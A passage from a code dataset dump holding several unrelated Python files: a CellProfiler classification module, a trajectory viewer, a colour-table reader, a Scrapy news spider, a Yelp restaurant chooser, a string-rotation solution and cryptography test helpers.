self.first_threshold_method,\n self.first_threshold,\n ),\n (\n self.second_measurement,\n self.second_threshold_method,\n self.second_threshold,\n ),\n ):\n result += [measurement_setting, threshold_method_setting]\n if threshold_method_setting == TM_CUSTOM:\n result += [threshold_setting]\n result += [self.wants_custom_names]\n if self.wants_custom_names:\n result += [\n self.low_low_custom_name,\n self.low_high_custom_name,\n self.high_low_custom_name,\n self.high_high_custom_name,\n ]\n result += [self.wants_image]\n if self.wants_image:\n result += [self.image_name]\n else:\n #\n # Visible results per single measurement\n #\n for group in self.single_measurements:\n if group.can_delete:\n result += [group.divider]\n result += [group.object_name, group.measurement, group.bin_choice]\n if group.bin_choice == BC_EVEN:\n result += [\n group.bin_count,\n group.low_threshold,\n group.wants_low_bin,\n group.high_threshold,\n group.wants_high_bin,\n ]\n else:\n result += [\n group.custom_thresholds,\n group.wants_low_bin,\n group.wants_high_bin,\n ]\n result += [group.wants_custom_names]\n if group.wants_custom_names:\n result += [group.bin_names]\n result += [group.wants_images]\n if group.wants_images:\n result += [group.image_name]\n if group.can_delete:\n result += [group.remove_settings_button]\n result += [self.add_measurement_button]\n return result\n\n def run(self, workspace):\n \"\"\"Classify the objects in the image cycle\"\"\"\n if self.contrast_choice == BY_SINGLE_MEASUREMENT:\n if self.show_window:\n workspace.display_data.labels = []\n workspace.display_data.bins = []\n workspace.display_data.values = []\n for group in self.single_measurements:\n self.run_single_measurement(group, workspace)\n elif self.contrast_choice == BY_TWO_MEASUREMENTS:\n self.run_two_measurements(workspace)\n else:\n raise ValueError(\n \"Invalid classification method: %s\" % self.contrast_choice.value\n )\n\n def display(self, workspace, figure):\n if self.contrast_choice == BY_TWO_MEASUREMENTS:\n self.display_two_measurements(workspace, figure)\n else:\n self.display_single_measurement(workspace, figure)\n\n def get_feature_name_matrix(self):\n \"\"\"Get a 2x2 matrix of feature names for two measurements\"\"\"\n if self.wants_custom_names:\n return numpy.array(\n [\n [self.low_low_custom_name.value, self.low_high_custom_name.value],\n [self.high_low_custom_name.value, self.high_high_custom_name.value],\n ]\n )\n else:\n m1 = self.first_measurement.value\n m2 = self.second_measurement.value\n return numpy.array(\n [\n [\"_\".join((m1, a1, m2, a2)) for a2 in (\"low\", \"high\")]\n for a1 in (\"low\", \"high\")\n ]\n )\n\n def run_two_measurements(self, workspace):\n measurements = workspace.measurements\n in_high_class = []\n saved_values = []\n objects = workspace.object_set.get_objects(self.object_name.value)\n has_nan_measurement = numpy.zeros(objects.count, bool)\n for feature, threshold_method, threshold in (\n (self.first_measurement, self.first_threshold_method, self.first_threshold),\n (\n self.second_measurement,\n self.second_threshold_method,\n self.second_threshold,\n ),\n ):\n values = measurements.get_current_measurement(\n self.object_name.value, feature.value\n )\n if len(values) < objects.count:\n values = numpy.hstack(\n (values, [numpy.NaN] * (objects.count - len(values)))\n )\n saved_values.append(values)\n has_nan_measurement = has_nan_measurement | numpy.isnan(values)\n if threshold_method == TM_CUSTOM:\n t = threshold.value\n elif len(values) == 0:\n t = 0\n elif threshold_method == TM_MEAN:\n t = numpy.mean(values[~numpy.isnan(values)])\n elif threshold_method == TM_MEDIAN:\n t = numpy.median(values[~numpy.isnan(values)])\n else:\n raise ValueError(\n \"Unknown threshold method: %s\" % threshold_method.value\n )\n in_high_class.append(values >= t)\n feature_names = self.get_feature_name_matrix()\n num_values = len(values)\n for i in range(2):\n for j in range(2):\n in_class = (\n (in_high_class[0].astype(int) == i)\n & (in_high_class[1].astype(int) == j)\n & (~has_nan_measurement)\n )\n measurements.add_measurement(\n self.object_name.value,\n \"_\".join((M_CATEGORY, feature_names[i, j])),\n in_class.astype(int),\n )\n num_hits = in_class.sum()\n measurement_name = \"_\".join(\n (M_CATEGORY, feature_names[i, j], F_NUM_PER_BIN)\n )\n measurements.add_measurement(IMAGE, measurement_name, num_hits)\n measurement_name = \"_\".join(\n (M_CATEGORY, feature_names[i, j], F_PCT_PER_BIN)\n )\n measurements.add_measurement(\n IMAGE,\n measurement_name,\n 100.0 * float(num_hits) / num_values if num_values > 0 else 0,\n )\n\n if self.wants_image:\n class_1, class_2 = in_high_class\n object_codes = class_1.astype(int) + class_2.astype(int) * 2 + 1\n object_codes = numpy.hstack(([0], object_codes))\n object_codes[numpy.hstack((False, numpy.isnan(values)))] = 0\n nobjects = len(class_1)\n mapping = numpy.zeros(nobjects + 1, int)\n mapping[1:] = numpy.arange(1, nobjects + 1)\n labels = object_codes[mapping[objects.segmented]]\n colors = self.get_colors(4)\n image = colors[labels, :3]\n image = Image(image, parent_image=objects.parent_image)\n workspace.image_set.add(self.image_name.value, image)\n\n if self.show_window:\n workspace.display_data.in_high_class = in_high_class\n workspace.display_data.labels = (objects.segmented,)\n workspace.display_data.saved_values = saved_values\n\n def display_two_measurements(self, workspace, figure):\n figure.set_subplots((2, 2))\n object_name = self.object_name.value\n for i, feature_name in (\n (0, self.first_measurement.value),\n (1, self.second_measurement.value),\n ):\n saved_values = workspace.display_data.saved_values[i]\n good_saved_values = saved_values[~numpy.isnan(saved_values)]\n if len(good_saved_values) == 0:\n figure.subplot_table(i, 0, [[\"No %s objects found\" % object_name]])\n else:\n axes = figure.subplot(i, 0)\n axes.hist(good_saved_values)\n axes.set_xlabel(feature_name)\n axes.set_ylabel(\"# of %s\" % object_name)\n class_1, class_2 = workspace.display_data.in_high_class\n object_codes = class_1.astype(int) + class_2.astype(int) * 2 + 1\n object_codes = numpy.hstack(([0], object_codes))\n nobjects = len(class_1)\n mapping = numpy.zeros(nobjects + 1, int)\n mapping[1:] = numpy.arange(1, nobjects + 1)\n for i in range(2):\n saved_values = workspace.display_data.saved_values[i]\n mapping[1:][numpy.isnan(saved_values)] = 0\n labels = object_codes[mapping[workspace.display_data.labels]]\n figure.subplot_imshow_labels(0, 1, labels, title=object_name)\n #\n # Draw a 4-bar histogram\n #\n axes = figure.subplot(1, 1)\n values = object_codes[1:]\n axes.hist(values[~numpy.isnan(values)], bins=4, range=(0.5, 4.5))\n axes.set_xticks((1, 2, 3, 4))\n if self.wants_custom_names:\n axes.set_xticklabels(\n (\n self.low_low_custom_name.value,\n self.high_low_custom_name.value,\n self.low_high_custom_name.value,\n self.high_high_custom_name.value,\n )\n )\n else:\n axes.set_xticklabels((\"low\\nlow\", \"high\\nlow\", \"low\\nhigh\", \"high\\nhigh\"))\n axes.set_ylabel(\"# of %s\" % object_name)\n colors = self.get_colors(len(axes.patches))\n #\n # The patches are the rectangles in the histogram\n #\n for i, patch in enumerate(axes.patches):\n patch.set_facecolor(colors[i + 1, :])\n\n def run_single_measurement(self, group, workspace):\n \"\"\"Classify objects based on one measurement\"\"\"\n object_name = group.object_name.value\n feature = group.measurement.value\n objects = workspace.object_set.get_objects(object_name)\n measurements = workspace.measurements\n values = measurements.get_current_measurement(object_name, feature)\n #\n # Pad values if too few (defensive programming).\n #\n if len(values) < objects.count:\n values = numpy.hstack((values, [numpy.NaN] * (objects.count - len(values))))\n if group.bin_choice == BC_EVEN:\n low_threshold = group.low_threshold.value\n high_threshold = group.high_threshold.value\n if low_threshold >= high_threshold:\n raise ValueError(\"Lower Threshold must be less than Upper Threshold\")\n bin_count = group.bin_count.value\n thresholds = (\n numpy.arange(bin_count + 1)\n * (high_threshold - low_threshold)\n / float(bin_count)\n + low_threshold\n )\n else:\n thresholds = [\n float(x.strip()) for x in group.custom_thresholds.value.split(\",\")\n ]\n #\n # Put infinities at either end of the thresholds so we can bin the\n # low and high bins\n #\n thresholds = numpy.hstack(\n (\n [-numpy.inf] if group.wants_low_bin else [],\n thresholds,\n [numpy.inf] if group.wants_high_bin else [],\n )\n )\n #\n # Do a cross-product of objects and threshold comparisons\n #\n ob_idx, th_idx = numpy.mgrid[0 : len(values), 0 : len(thresholds) - 1]\n bin_hits = (values[ob_idx] > thresholds[th_idx]) & (\n values[ob_idx] <= thresholds[th_idx + 1]\n )\n num_values = len(values)\n for bin_idx, feature_name in enumerate(group.bin_feature_names()):\n measurement_name = \"_\".join((M_CATEGORY, feature_name))\n measurements.add_measurement(\n object_name, measurement_name, bin_hits[:, bin_idx].astype(int)\n )\n measurement_name = \"_\".join((M_CATEGORY, feature_name, F_NUM_PER_BIN))\n num_hits = bin_hits[:, bin_idx].sum()\n measurements.add_measurement(IMAGE, measurement_name, num_hits)\n measurement_name = \"_\".join((M_CATEGORY, feature_name, F_PCT_PER_BIN))\n measurements.add_measurement(\n IMAGE,\n measurement_name,\n 100.0 * float(num_hits) / num_values if num_values > 0 else 0,\n )\n if group.wants_images or self.show_window:\n colors = self.get_colors(bin_hits.shape[1])\n object_bins = numpy.sum(bin_hits * th_idx, 1) + 1\n object_color = numpy.hstack(([0], object_bins))\n object_color[numpy.hstack((False, numpy.isnan(values)))] = 0\n labels = object_color[objects.segmented]\n if group.wants_images:\n image = colors[labels, :3]\n workspace.image_set.add(\n group.image_name.value,\n Image(image, parent_image=objects.parent_image),\n )\n\n if self.show_window:\n workspace.display_data.bins.append(object_bins[~numpy.isnan(values)])\n workspace.display_data.labels.append(labels)\n workspace.display_data.values.append(values[~numpy.isnan(values)])\n\n def display_single_measurement(self, workspace, figure):\n \"\"\"Display an array of single measurements\"\"\"\n figure.set_subplots((3, len(self.single_measurements)))\n for i, group in enumerate(self.single_measurements):\n bin_hits = workspace.display_data.bins[i]\n labels = workspace.display_data.labels[i]\n values = workspace.display_data.values[i]\n if len(values) == 0:\n continue\n #\n # A histogram of the values\n #\n axes = figure.subplot(0, i)\n axes.hist(values[~numpy.isnan(values)])\n axes.set_xlabel(group.measurement.value)\n axes.set_ylabel(\"# of %s\" % group.object_name.value)\n #\n # A histogram of the labels yielding the bins\n #\n axes = figure.subplot(1, i)\n axes.hist(\n bin_hits,\n bins=group.number_of_bins(),\n range=(0.5, group.number_of_bins() + 0.5),\n )\n axes.set_xticks(numpy.arange(1, group.number_of_bins() + 1))\n if group.wants_custom_names:\n axes.set_xticklabels(group.bin_names.value.split(\",\"))\n axes.set_xlabel(group.measurement.value)\n axes.set_ylabel(\"# of %s\" % group.object_name.value)\n colors = self.get_colors(len(axes.patches))\n for j, patch in enumerate(axes.patches):\n patch.set_facecolor(colors[j + 1, :])\n #\n # The labels matrix\n #\n figure.subplot_imshow_labels(\n 2,\n i,\n labels,\n title=group.object_name.value,\n sharexy=figure.subplot(2, 0),\n )\n\n def get_colors(self, count):\n \"\"\"Get colors used for two-measurement labels image\"\"\"\n import matplotlib.cm as cm\n\n cmap = cm.get_cmap(get_default_colormap())\n #\n # Trick the colormap into divulging the values used.\n #\n sm = cm.ScalarMappable(cmap=cmap)\n colors = sm.to_rgba(numpy.arange(count) + 1)\n return numpy.vstack((numpy.zeros(colors.shape[1]), colors))\n\n def prepare_settings(self, setting_values):\n \"\"\"Do any sort of adjustment to the settings required for the given values\n\n setting_values - the values for the settings\n\n This method allows a module to specialize itself according to\n the number of settings and their value. For instance, a module that\n takes a variable number of images or objects can increase or decrease\n the number of relevant settings so they map correctly to the values.\"\"\"\n\n single_measurement_count = int(setting_values[1])\n if single_measurement_count < len(self.single_measurements):\n del self.single_measurements[single_measurement_count:]\n while single_measurement_count > len(self.single_measurements):\n self.add_single_measurement(True)\n\n def validate_module(self, pipeline):\n if self.contrast_choice == BY_SINGLE_MEASUREMENT:\n for group in self.single_measurements:\n group.validate_group()\n\n def upgrade_settings(self, setting_values, variable_revision_number, module_name):\n \"\"\"Adjust setting values if they came from a previous revision\n\n setting_values - a sequence of strings representing the settings\n for the module as stored in the pipeline\n variable_revision_number - the variable revision number of the\n module at the time the pipeline was saved. Use this\n to determine how the incoming setting values map\n to those of the current module version.\n module_name - the name of the module that did the saving. This can be\n used to import the settings from another module if\n that module was merged into the current module\n \"\"\"\n if variable_revision_number == 1:\n # we modified this in the code but didn't want to bump the variable revision number.\n if BY_SINGLE_MEASUREMENT in setting_values[0]:\n contrast_choice = BY_SINGLE_MEASUREMENT\n else:\n contrast_choice = BY_TWO_MEASUREMENTS\n #\n # We inserted wants_low_bin and wants_high_bin in each group\n #\n new_setting_values = [contrast_choice, setting_values[1]]\n setting_values = setting_values[2:]\n for i in range(int(new_setting_values[1])):\n new_setting_values += setting_values[:3]\n #\n # Bin count changed: don't count the outer 2 bins\n #\n new_setting_values += [str(int(setting_values[3]) - 2)]\n new_setting_values += [setting_values[4]] + [\"Yes\"]\n new_setting_values += [setting_values[5]] + [\"Yes\"]\n new_setting_values += setting_values[6:11]\n setting_values = setting_values[11:]\n new_setting_values += setting_values\n setting_values = new_setting_values\n variable_revision_number = 2\n\n return setting_values, variable_revision_number\n\n def get_measurement_columns(self, pipeline):\n columns = []\n if self.contrast_choice == BY_SINGLE_MEASUREMENT:\n for group in self.single_measurements:\n columns += [\n (\n IMAGE,\n \"_\".join((M_CATEGORY, feature_name, F_NUM_PER_BIN)),\n COLTYPE_INTEGER,\n )\n for feature_name in group.bin_feature_names()\n ]\n columns += [\n (\n IMAGE,\n \"_\".join((M_CATEGORY, feature_name, F_PCT_PER_BIN)),\n COLTYPE_FLOAT,\n )\n for feature_name in group.bin_feature_names()\n ]\n columns += [\n (\n group.object_name.value,\n \"_\".join((M_CATEGORY, feature_name)),\n COLTYPE_INTEGER,\n )\n for feature_name in group.bin_feature_names()\n ]\n else:\n names = self.get_feature_name_matrix()\n columns += [\n (IMAGE, \"_\".join((M_CATEGORY, name, F_NUM_PER_BIN)), COLTYPE_INTEGER,)\n for name in names.flatten()\n ]\n columns += [\n (IMAGE, \"_\".join((M_CATEGORY, name, F_PCT_PER_BIN)), COLTYPE_FLOAT,)\n for name in names.flatten()\n ]\n columns += [\n (self.object_name.value, \"_\".join((M_CATEGORY, name)), COLTYPE_INTEGER,)\n for name in names.flatten()\n ]\n return columns\n\n def get_categories(self, pipeline, object_name):\n \"\"\"Return the categories of measurements that this module produces\n\n object_name - return measurements made on this object (or 'Image' for image measurements)\n \"\"\"\n if (\n (object_name == IMAGE)\n or (\n self.contrast_choice == BY_SINGLE_MEASUREMENT\n and object_name\n in [group.object_name.value for group in self.single_measurements]\n )\n or (\n self.contrast_choice == BY_TWO_MEASUREMENTS\n and object_name == self.object_name\n )\n ):\n return [M_CATEGORY]\n\n return []\n\n def get_measurements(self, pipeline, object_name, category):\n \"\"\"Return the measurements that this module produces\n\n object_name - return measurements made on this object (or 'Image' for image measurements)\n category - return measurements made in this category\n \"\"\"\n if category != M_CATEGORY:\n return []\n if self.contrast_choice == BY_SINGLE_MEASUREMENT:\n result = []\n for group in self.single_measurements:\n if group.object_name == object_name:\n return group.bin_feature_names()\n elif object_name == IMAGE:\n for image_features in (F_NUM_PER_BIN, F_PCT_PER_BIN):\n for bin_feature_names in group.bin_feature_names():\n result += [\"_\".join((bin_feature_names, image_features))]\n return result\n elif self.contrast_choice == BY_TWO_MEASUREMENTS:\n if self.object_name == object_name:\n return self.get_feature_name_matrix().flatten().tolist()\n elif object_name == IMAGE:\n result = []\n for image_features in (F_NUM_PER_BIN, F_PCT_PER_BIN):\n for bin_feature_names in (\n self.get_feature_name_matrix().flatten().tolist()\n ):\n result += [\"_\".join((bin_feature_names, image_features))]\n return result\n return []\n","sub_path":"cellprofiler/modules/classifyobjects.py","file_name":"classifyobjects.py","file_ext":"py","file_size_in_byte":44948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"313460761","text":"#!/usr/bin/env python\n\n# Copyright (c) 2018, University of Stuttgart\n# All rights reserved.\n#\n# Permission to use, copy, modify, and distribute this software for any purpose\n# with or without fee is hereby granted, provided that the above copyright\n# notice and this permission notice appear in all copies.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH\n# REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY\n# AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT,\n# INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM\n# LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR\n# OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR\n# PERFORMANCE OF THIS SOFTWARE.\n#\n# Jim Mainprice on Sunday June 13 2018\n\nfrom motion.trajectory import Trajectory\nimport time\nimport numpy as np\n\n\nclass TrajectoryOptimizationViewer:\n\n \"\"\" Wrapper around a Trajectory objective function\n tha can draw the inner optimization quantities \"\"\"\n\n def __init__(self, objective, draw=True, draw_gradient=True,\n use_3d_viewer=False):\n self.objective = objective\n self.viewer = None\n self._draw_gradient = False\n self._draw_hessian = False\n self._use_3d_viewer = use_3d_viewer\n if draw:\n self._draw_gradient = draw_gradient\n self._draw_hessian = draw_gradient\n self.init_viewer()\n\n def init_viewer(self):\n from . import workspace_renderer as renderer\n if not self._use_3d_viewer:\n self.viewer = renderer.WorkspaceOpenGl(self.objective.workspace)\n else:\n self.viewer = renderer.WorkspaceHeightmap(self.objective.workspace)\n self._draw_gradient = False\n self._draw_hessian = False\n self.reset_objective(self.objective)\n\n def reset_objective(self, objective):\n self.viewer.set_workspace(self.objective.workspace)\n self.viewer.draw_ws_background(self.objective.obstacle_potential)\n self.viewer.reset_objects()\n\n def draw_gradient(self, x):\n g = self.objective.objective.gradient(x)\n q_init = self.objective.q_init\n self.draw(\n Trajectory(q_init=q_init, x=x),\n Trajectory(q_init=q_init, x=-0.01 * g + x))\n\n def forward(self, x):\n return self.objective.objective(x)\n\n def gradient(self, x):\n if self.viewer is not None and self._draw_gradient:\n self.draw_gradient(x)\n return self.objective.objective.gradient(x)\n\n def hessian(self, x):\n if self.viewer is not None:\n if self._draw_hessian:\n self.draw_gradient(x)\n else:\n self.draw(Trajectory(q_init=self.objective.q_init, x=x))\n return self.objective.objective.hessian(x)\n\n def draw(self, trajectory, g_traj=None):\n\n if self.viewer is None:\n self.init_viewer()\n if self._use_3d_viewer:\n self.viewer.reset_spheres()\n\n q_init = self.objective.q_init\n for k in range(self.objective.T + 1):\n q = trajectory.configuration(k)\n color = (0, 0, 1) if k == 0 else (0, 1, 0)\n color = (1, 0, 0) if k == trajectory.T() else color\n if not self._use_3d_viewer:\n self.viewer.draw_ws_circle(.01, q, color)\n else:\n cost = self.objective.obstacle_potential(q)\n self.viewer.draw_ws_sphere(\n q, height=self.viewer.normalize_height(cost))\n if g_traj is not None:\n self.viewer.draw_ws_line([q, g_traj.configuration(k)])\n\n self.viewer.show()\n","sub_path":"pyrieef/rendering/optimization.py","file_name":"optimization.py","file_ext":"py","file_size_in_byte":3795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"622957202","text":"__author__ = 'ah14aeb'\n\n###################################################################\n# Routine to read Typhoon grid in HDF5 format into a python class\n# Created 24/05/2010 by RAC\n# Modification history:\n###################################################################\n\nfrom string import *\nfrom vtk import vtkColorTransferFunction\n\nclass typhoon_colour_table:\n def __init__(self,file):\n colour_data = read_typhoon_colour_table(file)\n self.colour_transfer_function = colour_data[0]\n self.reds = colour_data[1]\n self.greens = colour_data[2]\n self.blues = colour_data[3]\n self.name = colour_data[4]\n\n def dump(self):\n return self.colour_transfer_function, self.reds, self.greens, self.blues, self.name\n\n\ndef typhoon_read_colour_table(file):\n name = \"\"\n ff = open(file)\n lines = ff.readlines()\n ff.close()\n ctfun = vtkColorTransferFunction()\n rs,gs,bs = [],[],[]\n for i in lines:\n if i[0]!='#':\n idx,r,g,b = split(i)\n ctfun.AddRGBPoint(int(idx),float(r),float(g),float(b))\n rs.append(float(r))\n gs.append(float(g))\n bs.append(float(b))\n else:\n name = i[1:]\n\n return ctfun,rs,gs,bs,name\n","sub_path":"algos/com/SOM/Jim/typhoon_colour_table.py","file_name":"typhoon_colour_table.py","file_ext":"py","file_size_in_byte":1251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"509999094","text":"import scrapy\r\nimport pdb\r\nimport pytz\r\nfrom datetime import datetime\r\nfrom newsbot.items import NewsbotItem\r\nfrom main.models import News\r\n\r\nclass NewsSpider(scrapy.Spider):\r\n name = \"news\"\r\n def start_requests(self):\r\n\r\n url = 'https://nba.udn.com/nba/index?gr=www'\r\n\r\n yield scrapy.Request(url=url, callback=self.parse_first)\r\n\r\n def parse_first(self, response):\r\n selector = scrapy.Selector(response)\r\n news_url_list = selector.xpath('//*[@id=\"news_body\"]/dl//a/@href').extract()\r\n\r\n for news_url in news_url_list:\r\n\r\n # 如果 url 不為 null 且不為 javascript 語法\r\n if news_url and news_url != 'javascript:;':\r\n\r\n news_url = 'https://nba.udn.com' + news_url\r\n\r\n # 如果 url 在 DB 內沒出現過 (新的焦點新聞)\r\n if not News.objects.filter(post_url=news_url).exists():\r\n \r\n # 進入到要解析資料及預備 DjangoItem 的第二個 callback\r\n yield scrapy.Request(\r\n news_url,\r\n callback=self.parse_second\r\n )\r\n else:\r\n pass\r\n else:\r\n pass\r\n\r\n def parse_second(self, response):\r\n selector = scrapy.Selector(response)\r\n\r\n # 解析資料\r\n news_url = response.url\r\n title = selector.css('.story_art_title::text').get()\r\n subtitle = selector.css('.shareBar__info--author::text').get()\r\n img_url = selector.xpath('//*[@id=\"story_body_content\"]//img/@data-src').extract_first()\r\n post_date = datetime.strptime(selector.css(\".shareBar__info--author span::text\").get(), '%Y-%m-%d %H:%M')\r\n create_date = datetime.now()\r\n p_list = selector.css('#story_body_content > span > p ::text').getall() \r\n p_list = [ x for x in p_list if x not in (' Getty Images', 'facebook', 'twitter', 'pinterest')]\r\n context = \"\".join(p_list)\r\n \r\n news = NewsbotItem(\r\n title=title,\r\n subtitle=subtitle,\r\n context=context,\r\n post_url=news_url,\r\n img_url=img_url,\r\n post_date=post_date,\r\n create_date=create_date\r\n )\r\n\r\n yield news\r\n","sub_path":"scrapy-news/ScrapyNews/mysite/newsbot/newsbot/spiders/news_spider.py","file_name":"news_spider.py","file_ext":"py","file_size_in_byte":2402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"203333594","text":"import rauth\nimport re\nimport configparser\nimport random\n\n\ndef get_search_parameters(zipcode, range_meters=4000):\n \"\"\"Create search parameters for restaurant types.\"\"\"\n # Could be _get_search_parameters(x) since this is a helper function...\n # TODO : Maybe make it a helper function instead.\n\n params = {}\n params[\"term\"] = \"food\"\n params[\"location\"] = \"{}\".format(str(zipcode))\n params[\"radius_filte\"] = \"{}\".format(str(range_meters))\n # Too high of a limit means too many questions.\n # TODO : Find sweet spot.\n params[\"limit\"] = \"10\"\n\n return params\n\n\ndef get_results(params):\n \"\"\"Use search parameters to get search results.\"\"\"\n # Could be _get_results(x) since this is a helper function...\n # TODO : Maybe make it a helper function instead.\n\n # Keep api keys secret.\n\n # [api_keys]\n # consumer_key: adfjasdfahsdfaasdf\n # consumer_secret: asdhfajhsdfhasdf\n # token: asdhfjasdfhajsdfsa\n # token_secret: asdjfhahsdfasdjhfa\n\n # Except for the '# ' thats exactly how my config is formatted.\n\n c = configparser.ConfigParser()\n c.read(\"config.ini\")\n\n consumer_key = c.get('api_keys', 'consumer_key')\n consumer_secret = c.get('api_keys', 'consumer_secret')\n token = c.get('api_keys', 'token')\n token_secret = c.get('api_keys', 'token_secret')\n\n session = rauth.OAuth1Session(\n consumer_key=consumer_key,\n consumer_secret=consumer_secret,\n access_token=token,\n access_token_secret=token_secret)\n\n request = session.get(\"http://api.yelp.com/v2/search\", params=params)\n\n data = request.json()\n session.close()\n\n return data\n\n\ndef perform_search(listoflocations):\n \"\"\"Perform search for multiple locations as input.\"\"\"\n # Not exactly necessary unless doing multuple locations...\n # TODO : Recode without needing this function.\n api_calls = []\n for zipcode, range_meters in listoflocations:\n params = get_search_parameters(zipcode, range_meters)\n api_calls.append(get_results(params))\n return api_calls\n\n\ndef take_only_categories(datafromsearch):\n \"\"\"Only take categories from Yelp search results.\"\"\"\n # Yelp returns large list of values, may need other values later.\n # But for now, we only need the categories to make initial list.\n\n # TODO : Potentially use a list comp. instead? Shorter.\n lis = []\n for location in datafromsearch:\n for business in location['businesses']:\n lis.append((str(business['categories'])))\n return lis\n\n\ndef format_search_results(readfile):\n \"\"\"Format searchs so only relevant section of category is kept.\"\"\"\n # Yelp returns categories in format \"(Thai, thaifood)\". Only need Thai.\n filterRegex = re.compile(r\"'[A-Z].*?'\")\n categories_data = str(readfile)\n filteronly = set(filterRegex.findall(categories_data))\n\n finallist = []\n for item in filteronly:\n finallist.append(item.replace(\"'\", \"\"))\n\n return finallist\n\n\ndef write_to_file(filename, data):\n \"\"\"Write category results to file.\"\"\"\n # Really only needed to prevent calling yelp over and over while testing.\n # Testing not using this now. Most likely will delete soon.\n # Semi todo. Delete maybe? Can still use later so who knows.\n with open(filename, 'w') as f:\n for item in data:\n f.write(item)\n f.write('\\n')\n\n\ndef display_two_from_list(input_list):\n # Shuffle list so its not same order of questions every time.\n random.shuffle(input_list)\n list_chosen_final = []\n while len(input_list) >= 2: # Causes pop errors if we go till empty.\n list_choose_2_from = [] # list that displays 2 options for chooser.\n for i in range(2):\n list_choose_2_from.append(input_list.pop()) # Easy way to move.\n print('{}: (1), {}: (2) or neither: (0)'.format(list_choose_2_from[0],\n list_choose_2_from[1]))\n choice = input('Pick 1, 2, or 0. \\n')\n if choice not in ['1', '2', '0']:\n raise AssertionError(\"Invalid option.\")\n elif choice == '0':\n # Don't need to do anything.\n # Not returning results, or changing final list file.\n # TODO : Is there a better way than just pass?\n pass\n else:\n # choice 2 - 1 = 1 = 2nd choice / index since python starts from 0.\n list_chosen_final.append(list_choose_2_from.pop(int(choice) - 1))\n\n if len(input_list) == 1:\n # If len is 1, then something is left in original list.\n # Don't want to lose, so we'll just transfer it anyway.\n # User will have to decide on it soon or later.\n list_chosen_final.append(input_list[0])\n return list_chosen_final\n\n\ndef final_selection(input_list):\n random.shuffle(input_list) # Honestly probably don't need to shuffle tbh.\n # No need to worry about lists since theres only 2 options.\n print('{}: (1) or {}: (2)'.format(input_list[0], input_list[1]))\n choice = input('Pick 1 or 2. \\n')\n if choice not in ['1', '2']:\n raise AssertionError(\"Invalid option.\")\n else:\n # choice 2 - 1 = 1 = 2nd choice / index since python starts from 0.\n print('You picked: {}'.format(input_list[int(choice) - 1]))\n\n\ndef main():\n mainzipcode = input('What is your zipcode? Format = ##### \\n')\n print('To respond, just type 1 or 2 that matches the options.')\n meters_or_miles = input('Do you use meters: (1) or miles: (2)? \\n')\n distance = input('How far are you willing to go? Format = ## no unnits \\n')\n\n if meters_or_miles == '2':\n distance = int(distance) * 1600 # This should be close enough?\n locations = [(mainzipcode, distance)]\n\n # Aight this part is a little trick to follow.\n # Funcctional programming is hard.\n # Perform search innately uses get_search_parameters and get_results\n # And then take_only_categories and format_search_results follow\n d = format_search_results(take_only_categories(perform_search(locations)))\n\n # This line is here just to show users once.\n # If in a function it would loop.\n print('You must pick option (1), option (2), or Neither (0).')\n while len(d) > 2: # List gets shorter each time.\n d = display_two_from_list(d)\n # Once list is down to 2 things, it will just run the final function.\n final_selection(d)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"275172064","text":"# https://leetcode.com/problems/rotate-string/description/\n\n\nclass Solution:\n def rotateString(self, A, B):\n \"\"\"\n :type A: str\n :type B: str\n :rtype: bool\n \"\"\"\n\n A2 = A + A\n len_A2 = len(A2)\n len_B = len(B)\n\n for i in range(len_A2-len_B+1):\n if A2[i:i+len_B] == B:\n return True\n\n return False\n","sub_path":"_PYTHON_/_problems_/_LC_/algorithms/rotate_string.py","file_name":"rotate_string.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"397365554","text":"import binascii\nimport os\n\nimport pytest\n\nfrom cryptography.hazmat.bindings import _ALL_BACKENDS\nfrom cryptography.hazmat.primitives import hashes\nfrom cryptography.hazmat.primitives import hmac\nfrom cryptography.hazmat.primitives.ciphers import Cipher\n\nfrom ...utils import load_vectors_from_file\n\n\ndef generate_encrypt_test(param_loader, path, file_names, cipher_factory,\n mode_factory, only_if=lambda backend: True,\n skip_message=None):\n def test_encryption(self):\n for backend in _ALL_BACKENDS:\n for file_name in file_names:\n for params in load_vectors_from_file(\n os.path.join(path, file_name),\n param_loader\n ):\n yield (\n encrypt_test,\n backend,\n cipher_factory,\n mode_factory,\n params,\n only_if,\n skip_message\n )\n return test_encryption\n\n\ndef encrypt_test(backend, cipher_factory, mode_factory, params, only_if,\n skip_message):\n if not only_if(backend):\n pytest.skip(skip_message)\n plaintext = params.pop(\"plaintext\")\n ciphertext = params.pop(\"ciphertext\")\n cipher = Cipher(\n cipher_factory(**params),\n mode_factory(**params),\n backend=backend\n )\n encryptor = cipher.encryptor()\n actual_ciphertext = encryptor.update(binascii.unhexlify(plaintext))\n actual_ciphertext += encryptor.finalize()\n assert actual_ciphertext == binascii.unhexlify(ciphertext)\n decryptor = cipher.decryptor()\n actual_plaintext = decryptor.update(binascii.unhexlify(ciphertext))\n actual_plaintext += decryptor.finalize()\n assert actual_plaintext == binascii.unhexlify(plaintext)\n\n\ndef generate_stream_encryption_test(param_loader, path, file_names,\n cipher_factory, only_if=None,\n skip_message=None):\n def test_stream_encryption(self):\n for backend in _ALL_BACKENDS:\n for file_name in file_names:\n for params in load_vectors_from_file(\n os.path.join(path, file_name),\n param_loader\n ):\n yield (\n stream_encryption_test,\n backend,\n cipher_factory,\n params,\n 